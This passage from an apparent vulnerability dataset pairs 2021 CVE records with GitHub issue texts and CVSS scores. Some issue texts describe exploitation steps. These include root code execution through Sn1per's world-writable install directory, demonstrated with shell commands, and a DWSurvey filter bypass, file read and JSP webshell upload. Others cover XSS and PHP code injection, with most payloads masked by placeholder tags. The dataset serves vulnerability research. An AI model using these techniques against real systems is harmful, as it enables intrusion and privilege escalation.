  69626. "baseScore": 6.1,
  69627. "impactScore": 2.7,
  69628. "exploitabilityScore": 2.8
  69629. },
  69630. {
  69631. "CVE_ID": "CVE-2021-39194",
  69632. "Issue_Url_old": "https://github.com/charleskorn/kaml/issues/179",
  69633. "Issue_Url_new": "https://github.com/charleskorn/kaml/issues/179",
  69634. "Repo_new": "charleskorn/kaml",
  69635. "Issue_Created_At": "2021-09-02T18:45:21Z",
  69636. "description": "Polymorphic serialization hangs. Hello. Many thanks for this great library. We ran into an issue that is quite strange. The deserialization hangs in this specific case, meaning that the process does not terminate, but uses NUMBERTAG CPU. CODETAG This is what I see when I pause and enter debugger FILETAG",
  69637. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  69638. "severity": "MEDIUM",
  69639. "baseScore": 6.5,
  69640. "impactScore": 3.6,
  69641. "exploitabilityScore": 2.8
  69642. },
  69643. {
  69644. "CVE_ID": "CVE-2021-39222",
  69645. "Issue_Url_old": "https://github.com/nextcloud/spreed/issues/542",
  69646. "Issue_Url_new": "https://github.com/nextcloud/spreed/issues/542",
  69647. "Repo_new": "nextcloud/spreed",
  69648. "Issue_Created_At": "2018-01-06T10:37:14Z",
  69649. "description": "When APITAG NUMBERTAG get released?. General Question When APITAG NUMBERTAG get released? Thanks",
  69650. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69651. "severity": "MEDIUM",
  69652. "baseScore": 6.1,
  69653. "impactScore": 2.7,
  69654. "exploitabilityScore": 2.8
  69655. },
  69656. {
  69657. "CVE_ID": "CVE-2021-39273",
  69658. "Issue_Url_old": "https://github.com/1N3/Sn1per/issues/358",
  69659. "Issue_Url_new": "https://github.com/1n3/sn1per/issues/358",
  69660. "Repo_new": "1N3/Sn1per",
  69661. "Issue_Created_At": "2021-08-17T15:43:44Z",
  69662. "description": "Insecure permissions NUMBERTAG recursively set on installation directory and all files after running main script allow privilege escalation/code execution as root. Sn1per NUMBERTAG free edition, Ubuntu NUMBERTAG Installation directory permissions before first run of the script: root APITAG ls la PATHTAG total NUMBERTAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG Dockerfile rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG bin drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG conf rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG loot drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG modes drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG plugins drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG pro rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG sniper rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG templates rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG wordlists Running sn1per: root APITAG sniper t APITAG [ ] Loaded configuration file from PATHTAG [OK] [ ] Loaded configuration file from APITAG [OK] [ ] Saving loot to PATHTAG [OK] [ ] Scanning APITAG [OK] ... [ ] Opening loot directory PATHTAG [OK] + =[ Generating reports... [snip] + =[ Sorting all files... + =[ Removing blank screenshots and files... + =[ Sn1per Professional is not installed. To download Sn1per Professional, go to FILETAG + =[ Done! Permissions on installation directory after script finishes: root APITAG ls la PATHTAG total NUMBERTAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG Dockerfile rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG bin drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG conf rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG loot drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG modes drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG plugins drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG pro rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwsrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG sniper rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG templates rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG wordlists Issue: Lines NUMBERTAG from init function from main script: chmod NUMBERTAG Rf $INSTALL_DIR NUMBERTAG dev/null chown root $INSTALL_DIR/sniper NUMBERTAG dev/null chmod NUMBERTAG INSTALL_DIR/sniper NUMBERTAG dev/null",
  69663. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  69664. "severity": "HIGH",
  69665. "baseScore": 8.8,
  69666. "impactScore": 5.9,
  69667. "exploitabilityScore": 2.8
  69668. },
  69669. {
  69670. "CVE_ID": "CVE-2021-39274",
  69671. "Issue_Url_old": "https://github.com/1N3/Sn1per/issues/357",
  69672. "Issue_Url_new": "https://github.com/1n3/sn1per/issues/357",
  69673. "Repo_new": "1N3/Sn1per",
  69674. "Issue_Created_At": "2021-08-17T15:39:45Z",
  69675. "description": "Insecure permissions NUMBERTAG on installation folder after running install script allow code execution/privilege escalation.. Sn1per NUMBERTAG free, tested on Ubuntu NUMBERTAG root APITAG uname a Linux snipertest NUMBERTAG gcp NUMBERTAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG APITAG root APITAG cat /etc/lsb release APITAG DISTRIB_RELEASE NUMBERTAG DISTRIB_CODENAME=hirsute APITAG NUMBERTAG Issue is from FILETAG script lines NUMBERTAG snip] mkdir p $INSTALL_DIR NUMBERTAG dev/null chmod NUMBERTAG Rf $INSTALL_DIR NUMBERTAG dev/null chown root $INSTALL_DIR/sniper NUMBERTAG dev/null chmod NUMBERTAG INSTALL_DIR/sniper NUMBERTAG dev/null [snip] root APITAG ls ld PATHTAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG PATHTAG user APITAG id uid NUMBERTAG user) gid NUMBERTAG user) APITAG sudoers) user APITAG cd PATHTAG PATHTAG ls la total NUMBERTAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG Dockerfile rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG bin drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG conf rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG loot drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG modes drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG plugins drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG pro rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG sniper rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG templates rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG wordlists NUMBERTAG Code execution as root via main script modification: PATHTAG mv sniper . APITAG PATHTAG echo \"touch /proof\" > sniper PATHTAG cat . APITAG >> sniper PATHTAG chmod +x sniper PATHTAG ls la sniper rwxrwxr NUMBERTAG user user NUMBERTAG Aug NUMBERTAG sniper PATHTAG root APITAG sniper [ ] Loaded configuration file from PATHTAG [OK] [ ] Loaded configuration file from APITAG [OK] ____ _________ / _/___ ___ _____ / ___/ __ \\ / // __ \\/ _ \\/ ___/ (__ ) / / // // /_/ / __/ / PATHTAG PATHTAG PATHTAG /_/ + =[ FILETAG + =[ Sn1per NUMBERTAG by MENTIONTAG You need to specify a target or workspace to use. Type sniper help for command usage. root APITAG root APITAG ls la /proof rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG proof NUMBERTAG Code execution as root via config file modification PATHTAG mv APITAG . APITAG PATHTAG echo \"touch /proof2\" > APITAG PATHTAG cat . APITAG >> APITAG PATHTAG root APITAG ls la /proof2 ls: cannot access '/proof2': No such file or directory root APITAG sniper [ ] Loaded configuration file from PATHTAG [OK] [ ] Loaded configuration file from APITAG [OK] ____ _________ / _/___ ___ _____ / ___/ __ \\ / // __ \\/ _ \\/ ___/ (__ ) / / // // /_/ / __/ / PATHTAG PATHTAG PATHTAG /_/ + =[ FILETAG + =[ Sn1per NUMBERTAG by MENTIONTAG You need to specify a target or workspace to use. Type sniper help for command usage. root APITAG ls la /proof2 rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG proof2 root APITAG",
  69676. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69677. "severity": "CRITICAL",
  69678. "baseScore": 9.8,
  69679. "impactScore": 5.9,
  69680. "exploitabilityScore": 3.9
  69681. },
  69682. {
  69683. "CVE_ID": "CVE-2021-39371",
  69684. "Issue_Url_old": "https://github.com/geopython/OWSLib/issues/790",
  69685. "Issue_Url_new": "https://github.com/geopython/owslib/issues/790",
  69686. "Repo_new": "geopython/owslib",
  69687. "Issue_Created_At": "2021-07-29T18:30:55Z",
  69688. "description": "Propose to replace lxml with defusedxml. The vulnerabilities caused by using lxml can be addressed by using defusedxml URLTAG . I've had success with just replacing APITAG with APITAG .",
  69689. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  69690. "severity": "HIGH",
  69691. "baseScore": 7.5,
  69692. "impactScore": 3.6,
  69693. "exploitabilityScore": 3.9
  69694. },
  69695. {
  69696. "CVE_ID": "CVE-2021-39383",
  69697. "Issue_Url_old": "https://github.com/wkeyuan/DWSurvey/issues/81",
  69698. "Issue_Url_new": "https://github.com/wkeyuan/dwsurvey/issues/81",
  69699. "Repo_new": "wkeyuan/dwsurvey",
  69700. "Issue_Created_At": "2021-08-16T02:59:50Z",
  69701. "description": "There is a remote command execution vulnerability. The save method in the PATHTAG file directly accepts the parameters passed from the client to write to the file, and the file is directly included in FILETAG , resulting in rce A file write operation was performed on the specified file in the APITAG method FILETAG In the save method, the APITAG method is invoked to write the FILETAG , and the APITAG variable comes from the assignment at the beginning of the Sava method. FILETAG FILETAG FILETAG The APITAG method of the APITAG class filters the request parameters by judging whether the URI contains APITAG FILETAG You can see that it is mainly Chinese substitution for special characters FILETAG Since it is determined whether to call the filter function by judging whether the URI contains APITAG , it can be bypassed by adding APITAG in front of the path Finally, it is found in FILETAG that the file is included FILETAG Poc: ERRORTAG visit URLTAG , success rce: FILETAG",
  69702. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69703. "severity": "CRITICAL",
  69704. "baseScore": 9.8,
  69705. "impactScore": 5.9,
  69706. "exploitabilityScore": 3.9
  69707. },
  69708. {
  69709. "CVE_ID": "CVE-2021-39384",
  69710. "Issue_Url_old": "https://github.com/wkeyuan/DWSurvey/issues/80",
  69711. "Issue_Url_new": "https://github.com/wkeyuan/dwsurvey/issues/80",
  69712. "Repo_new": "wkeyuan/dwsurvey",
  69713. "Issue_Created_At": "2021-08-16T02:45:58Z",
  69714. "description": "There are arbitrary file reading vulnerabilities and background rce vulnerabilities. In the latest version of dwsurvey oss NUMBERTAG there is a APITAG Request forwarding. Since the same request object and response object are shared before and after forwarding, the forwarded response will be output to the byte array buffer in memory, and finally the file is written in the printstream function. Because APITAG is a jump between internal resources, you can request internal sensitive files on the server, such as: / WEB INF / FILETAG , causing arbitrary file vulnerabilities by writing and re accessing; In addition, it can also cause rce in combination with background file upload. Request forwarding exists in the server method in the PATHTAG file FILETAG Due to the existence of bytearrayoutputstream, the forwarded response is saved in the byte array buffer in memory The flushdo function was passed in FILETAG Here, it is converted into a string and assigned to the document variable FILETAG Pass in printstream function FILETAG Splice savepath and filename as the target file, and finally write the response content to the file. The savepath and filename variables can also be controlled from the above FILETAG payload\uff1a URLTAG The FILETAG file will be written in the web root directory and then accessed FILETAG Successfully read database configuration file: FILETAG You can also find a file upload place in the background to create rce, create a new questionnaire > Advanced Editor in the background, and upload a picture horse and burpsuite to capture the package FILETAG FILETAG Visit FILETAG \uff0cthe JSP file will be generated in the web root directory Due to the Jsoup. parse method resolution to escape of JSP tags, when tested, when using the ' APITAG APITAG ' tag to package payload, can successfully bypass escaped FILETAG So the uploaded image file content is: APITAG APITAG APITAG Visit URLTAG successfully rce: FILETAG",
  69715. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69716. "severity": "CRITICAL",
  69717. "baseScore": 9.8,
  69718. "impactScore": 5.9,
  69719. "exploitabilityScore": 3.9
  69720. },
  69721. {
  69722. "CVE_ID": "CVE-2021-39390",
  69723. "Issue_Url_old": "https://github.com/partkeepr/PartKeepr/issues/1237",
  69724. "Issue_Url_new": "https://github.com/partkeepr/partkeepr/issues/1237",
  69725. "Repo_new": "partkeepr/partkeepr",
  69726. "Issue_Created_At": "2022-02-22T12:47:49Z",
  69727. "description": "Stored XSS in APITAG Description Stored XSS in APITAG NUMBERTAG Edit section in multiple api endpoints via name parameter Reproduction Steps Browsing to Edit tab, select project and add new project. There, insert the following payload ERRORTAG in name field. APITAG The request performed is the following, being name the vulnerable parameter : ERRORTAG Then, when another user goes to edit tab and clicks the project with the payload as name, XSS triggers APITAG Apart from projects , the following tabs are also vulnerable : footprints , manufacturers , storage locations , distributors , part measurement units , units and batch jobs System Information APITAG Version NUMBERTAG Operating System: APITAG Web Server: Apache PHP Version NUMBERTAG Database and version: Mysql Reproducible on the demo system: Yes",
  69728. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  69729. "severity": "MEDIUM",
  69730. "baseScore": 5.4,
  69731. "impactScore": 2.7,
  69732. "exploitabilityScore": 2.3
  69733. },
  69734. {
  69735. "CVE_ID": "CVE-2021-39391",
  69736. "Issue_Url_old": "https://github.com/beego/beego/issues/4727",
  69737. "Issue_Url_new": "https://github.com/beego/beego/issues/4727",
  69738. "Repo_new": "beego/beego",
  69739. "Issue_Created_At": "2021-08-15T12:28:51Z",
  69740. "description": "XSS in Admin Panel. When navigating to a page, the path is not sanitized in the APITAG statistics\" in the admin panel, leading to an XSS. For example, navigating to APITAG leads to an alert when viewed on the admin panel: FILETAG",
  69741. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69742. "severity": "MEDIUM",
  69743. "baseScore": 6.1,
  69744. "impactScore": 2.7,
  69745. "exploitabilityScore": 2.8
  69746. },
  69747. {
  69748. "CVE_ID": "CVE-2021-39416",
  69749. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/17",
  69750. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/17",
  69751. "Repo_new": "remoteclinic/remoteclinic",
  69752. "Issue_Created_At": "2021-08-16T11:38:23Z",
  69753. "description": "Multiple Cross Site Scripting Vulnerabilities in Remote Clinic NUMBERTAG In Remote Clinic NUMBERTAG there are multiple Cross Site Scripting vulnerabilities via the Contact, Email, Weight, Profession, ref_contact, and address parameters in FILETAG are vulnerable due to the _POSTs not being sanitized properly for XSS despite being sent through the friendly function. In Remote Clinic NUMBERTAG there is Stored Cross Site Scripting and no sanitization for the gender, age, serial parameters when retrieved by _POST in FILETAG to be sent to the database. This is possible by changing the values in the dropdowns in the inspect menu. In Remote Clinic NUMBERTAG in FILETAG , the Contact, Email, Weight, Profession, ref_contact, and address parameters being edited are not sanitized for Cross Site Scripting when they are retrieved by _POST. In Remote APITAG NUMBERTAG in FILETAG , the serial, age, and gender dropdowns are able to be changed via the inspect menu In Remote Clinic NUMBERTAG in FILETAG , the Title, First Name, Last Name, Skype, and Address parameters sent by _POST to be put in the database, is unsanitized and prone to Cross Site Scripting (XSS) In Remote Clinic NUMBERTAG in FILETAG , most of the parameters being passed into the database are sanitized insufficiently. The parameters that allow Cross Site Scripting are portal_name, guardian_short_name, guardian_name, opening_time, closing_time, access_level NUMBERTAG access_level NUMBERTAG access_level NUMBERTAG access_level NUMBERTAG access_level NUMBERTAG currency, mobile_number, address, patient_contact, patient_address, and patient_email.",
  69754. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69755. "severity": "MEDIUM",
  69756. "baseScore": 6.1,
  69757. "impactScore": 2.7,
  69758. "exploitabilityScore": 2.8
  69759. },
  69760. {
  69761. "CVE_ID": "CVE-2021-39480",
  69762. "Issue_Url_old": "https://github.com/m4b/bingrep/issues/30",
  69763. "Issue_Url_new": "https://github.com/m4b/bingrep/issues/30",
  69764. "Repo_new": "m4b/bingrep",
  69765. "Issue_Created_At": "2021-08-09T12:42:31Z",
  69766. "description": "memory allocation of NUMBERTAG bytes failed FILETAG ERRORTAG",
  69767. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69768. "severity": "HIGH",
  69769. "baseScore": 7.5,
  69770. "impactScore": 3.6,
  69771. "exploitabilityScore": 3.9
  69772. },
  69773. {
  69774. "CVE_ID": "CVE-2021-39491",
  69775. "Issue_Url_old": "https://github.com/yogeshojha/rengine/issues/460",
  69776. "Issue_Url_new": "https://github.com/yogeshojha/rengine/issues/460",
  69777. "Repo_new": "yogeshojha/rengine",
  69778. "Issue_Created_At": "2021-08-20T03:48:35Z",
  69779. "description": "FILETAG I have confirmed that this issue can be reproduced as described on a latest version/pull of APITAG yes Technical details Debian NUMBERTAG",
  69780. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  69781. "severity": "MEDIUM",
  69782. "baseScore": 5.4,
  69783. "impactScore": 2.7,
  69784. "exploitabilityScore": 2.3
  69785. },
  69786. {
  69787. "CVE_ID": "CVE-2021-39499",
  69788. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/18",
  69789. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/18",
  69790. "Repo_new": "weng-xianhu/eyoucms",
  69791. "Issue_Created_At": "2021-08-21T15:53:36Z",
  69792. "description": "Change email address in user's function lead to XSS. I and MENTIONTAG found a XSS vulnerability on a user function called APITAG when we audit your source code. The vulnerability occurs when we input new email with injecting some trick to trigger XSS in title param like: APITAG To trigger this bug, we did following below NUMBERTAG Access url: URLTAG APITAG NUMBERTAG Enter a valid email NUMBERTAG Click to Send ( APITAG in your language) button. And then the XSS is triggered. Solution: To fix this vulnerability, please validate input from user into title param",
  69793. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69794. "severity": "MEDIUM",
  69795. "baseScore": 6.1,
  69796. "impactScore": 2.7,
  69797. "exploitabilityScore": 2.8
  69798. },
  69799. {
  69800. "CVE_ID": "CVE-2021-39501",
  69801. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/17",
  69802. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/17",
  69803. "Repo_new": "weng-xianhu/eyoucms",
  69804. "Issue_Created_At": "2021-08-21T15:19:24Z",
  69805. "description": "There is Open redirect vulnerability in param \"referurl\" of Logout function. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Logout function accepts a user controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. FILETAG APITAG Requests: CODETAG",
  69806. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69807. "severity": "MEDIUM",
  69808. "baseScore": 6.1,
  69809. "impactScore": 2.7,
  69810. "exploitabilityScore": 2.8
  69811. },
  69812. {
  69813. "CVE_ID": "CVE-2021-39503",
  69814. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/15",
  69815. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/15",
  69816. "Repo_new": "gaozhifeng/phpmywind",
  69817. "Issue_Created_At": "2021-08-22T08:31:32Z",
  69818. "description": "PHP Code Execution via create new site function in FILETAG . Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Submit date: PATHTAG Target: FILETAG Condition: Admin user Version NUMBERTAG Description: In APITAG function of FILETAG file call to APITAG function to append content when i create a new site to FILETAG file, becase of filtered input without \"<, >, ?, =, `,....\" the attacker can append ?> to close php syntax and adding new php function In FILETAG file FILETAG FILETAG APITAG function: FILETAG APITAG FILETAG In FILETAG file FILETAG Then back to .php files in /admin/ directory to execute code FILETAG Request CODETAG Response CODETAG",
  69819. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  69820. "severity": "HIGH",
  69821. "baseScore": 7.2,
  69822. "impactScore": 5.9,
  69823. "exploitabilityScore": 1.2
  69824. },
  69825. {
  69826. "CVE_ID": "CVE-2021-39514",
  69827. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/36",
  69828. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/36",
  69829. "Repo_new": "thorfdbg/libjpeg",
  69830. "Issue_Created_At": "2020-08-04T02:48:57Z",
  69831. "description": "A heap overflow in APITAG causes segment fault. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  69832. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69833. "severity": "MEDIUM",
  69834. "baseScore": 6.5,
  69835. "impactScore": 3.6,
  69836. "exploitabilityScore": 2.8
  69837. },
  69838. {
  69839. "CVE_ID": "CVE-2021-39515",
  69840. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/37",
  69841. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/37",
  69842. "Repo_new": "thorfdbg/libjpeg",
  69843. "Issue_Created_At": "2020-08-04T12:51:56Z",
  69844. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  69845. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69846. "severity": "MEDIUM",
  69847. "baseScore": 6.5,
  69848. "impactScore": 3.6,
  69849. "exploitabilityScore": 2.8
  69850. },
  69851. {
  69852. "CVE_ID": "CVE-2021-39516",
  69853. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/42",
  69854. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/42",
  69855. "Repo_new": "thorfdbg/libjpeg",
  69856. "Issue_Created_At": "2020-08-13T04:27:58Z",
  69857. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  69858. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69859. "severity": "MEDIUM",
  69860. "baseScore": 6.5,
  69861. "impactScore": 3.6,
  69862. "exploitabilityScore": 2.8
  69863. },
  69864. {
  69865. "CVE_ID": "CVE-2021-39517",
  69866. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/33",
  69867. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/33",
  69868. "Repo_new": "thorfdbg/libjpeg",
  69869. "Issue_Created_At": "2020-08-04T01:54:43Z",
  69870. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG POC FILETAG",
  69871. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69872. "severity": "MEDIUM",
  69873. "baseScore": 6.5,
  69874. "impactScore": 3.6,
  69875. "exploitabilityScore": 2.8
  69876. },
  69877. {
  69878. "CVE_ID": "CVE-2021-39518",
  69879. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/35",
  69880. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/35",
  69881. "Repo_new": "thorfdbg/libjpeg",
  69882. "Issue_Created_At": "2020-08-04T02:45:44Z",
  69883. "description": "A heap overflow in APITAG causes segment fault. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  69884. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69885. "severity": "MEDIUM",
  69886. "baseScore": 6.5,
  69887. "impactScore": 3.6,
  69888. "exploitabilityScore": 2.8
  69889. },
  69890. {
  69891. "CVE_ID": "CVE-2021-39519",
  69892. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/28",
  69893. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/28",
  69894. "Repo_new": "thorfdbg/libjpeg",
  69895. "Issue_Created_At": "2020-08-01T14:34:03Z",
  69896. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG POC FILETAG",
  69897. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69898. "severity": "MEDIUM",
  69899. "baseScore": 6.5,
  69900. "impactScore": 3.6,
  69901. "exploitabilityScore": 2.8
  69902. },
  69903. {
  69904. "CVE_ID": "CVE-2021-39520",
  69905. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/34",
  69906. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/34",
  69907. "Repo_new": "thorfdbg/libjpeg",
  69908. "Issue_Created_At": "2020-08-04T02:30:41Z",
  69909. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  69910. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69911. "severity": "MEDIUM",
  69912. "baseScore": 6.5,
  69913. "impactScore": 3.6,
  69914. "exploitabilityScore": 2.8
  69915. },
  69916. {
  69917. "CVE_ID": "CVE-2021-39521",
  69918. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/262",
  69919. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/262",
  69920. "Repo_new": "libredwg/libredwg",
  69921. "Issue_Created_At": "2020-08-03T14:19:33Z",
